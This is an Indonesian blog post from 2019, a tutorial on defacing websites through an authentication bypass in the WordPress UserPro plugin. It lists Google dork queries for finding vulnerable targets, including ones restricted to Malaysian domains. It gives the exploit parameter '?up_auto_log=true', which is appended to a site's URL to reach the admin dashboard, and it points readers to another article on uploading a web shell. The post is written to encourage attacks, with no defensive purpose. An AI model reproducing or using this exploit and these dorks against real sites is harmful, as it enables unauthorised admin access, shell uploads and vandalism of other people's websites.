Cara Deface Userpro Authentication Bypass
Kamis, 10 Oktober 2019
Tulis Komentar
sebenernya si gampang tinggal kasih exploit di belakang url kita bisa langsung masuk ke dashboard admin. kaya no poc no redirect gitu. langsung aja
Video Tutorial:
Bahan:
Android/lepi
Akses internet
Browser
Target
Brain
Dork:
inurl:/plugins/userpro
inurl:/wp-content/plugins/userpro
inurl:/userpro site:.my
inurl:/wp-content/plugins/userpro/index.php
Exploit: /?up_auto_log=true
Example: https://site.com/?up_auto_log=true
Pertama kalian ngedork dulu di google, disini gw asumsikan kalian udah dapet live target.
nah liat ss diatas, website masih normal kita belum mendapatkan hak user admin
sekarang coba kasih exploit di belakang urlnya.
Boom, bagi yang belum bisa atau belum tau cara upload shell di cms wordpress bisa liat artikel
DISINI
Goodluck!
Belum ada Komentar untuk "Cara Deface Userpro Authentication Bypass "
Posting Komentar